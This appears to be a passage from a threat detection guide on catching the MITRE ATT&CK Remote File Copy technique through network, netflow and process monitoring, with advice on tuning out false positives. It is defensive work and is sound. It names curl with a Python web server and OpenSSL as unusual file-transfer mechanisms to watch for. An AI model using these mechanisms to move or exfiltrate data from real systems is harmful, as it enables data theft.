MITRE’s data sources
- File monitoring
- Packet capture
- Process use of network
- Netflow/Enclave netflow
- Network protocol analysis
- Process monitoring
In addition to those data sources listed by MITRE ATT&CK, security teams should consider collecting from the following log sources:
- Firewall logs
- Database logs
- Email logs
Netflow/Enclave netflow and network protocol analysis
Network protocol analysis and/or Netflow will have the best chance to detect remote file transfers because, by definition, a Remote File Copy will have to traverse the network.
Process monitoring serves as an excellent supplement to network-based monitoring. Since it’s host based, this data source isn’t as easily affected by the evasion techniques that adversaries often use to subvert network-based security technologies, such as encryption or the misuse of network protocols.
You’ll want to establish a baseline for expected network activity and then alert on unusual network usage based on the following:
- Destination-source objects
- Data volume
- Other network traffic characteristics
This has been particularly effective in detecting data exfiltration. As an example, Red Canary had detected more than 1,000 confirmed threats this year based on detection and analysis of an excessive number of SMB sessions.
In terms of process data, there are a number of operating system-level commands that are capable of—but unusual mechanisms for—file transfer. Some examples include the use of:
- Python web server and curl
- OpenSSL for encrypted file transfers
Examining telemetry for these unusual events can be an effective way to detect malicious Remote File Copies. That said, most adversaries will only resort to using these unusual mechanisms for file transfer if more typical ones—such as file transfer protocol (FTP and secure copy (SCP), for example—are not available.
In addition, any non-native applications that establish network connections should be viewed with suspicion. The nearly 200 threats that MITRE ATT&CK lists for this technique include numerous examples that may be detectable in this way.
Weeding out false positives
False positive rates for detecting malicious Remote File Copying will vary widely from one environment to the next. For example, a public FTP server might generate an excessive number of alerts for suspicious FTP connections, so analytics based on any data source will need to be tuned for the environment in which they’re deployed. In some environments, connections to network printers may skew the expected network connections for system processes such as Notepad.
The two data sources suggested above (network and process data) probably have the greatest capacity to generate false positives if you fail to tune them. In general, process data is easier to tune, since it tends to include more context (e.g., user context, frequency analysis, and process ancestry) that can be used to determine behavior and intent.